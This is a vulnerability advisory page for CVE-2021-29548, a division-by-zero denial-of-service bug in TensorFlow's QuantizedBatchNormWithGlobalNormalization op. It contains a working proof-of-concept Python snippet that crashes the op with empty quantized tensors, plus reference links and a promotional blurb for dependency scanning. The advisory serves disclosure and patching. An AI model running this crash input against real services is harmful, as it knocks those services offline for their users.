CVE-2021-29548: Division by 0 in `QuantizedBatchNormWithGlobalNormalization`
(updated )
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization
:
import tensorflow as tf
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)
gamma_max = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBatchNormWithGlobalNormalization(
t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,
v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,
beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,
gamma_max=gamma_max, out_type=tf.qint32,
variance_epsilon=0.1, scale_after_normalization=True)
References
- github.com/advisories/GHSA-p45v-v4pw-77jr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-476.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-674.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-185.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-p45v-v4pw-77jr
- nvd.nist.gov/vuln/detail/CVE-2021-29548
Detect and mitigate CVE-2021-29548 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →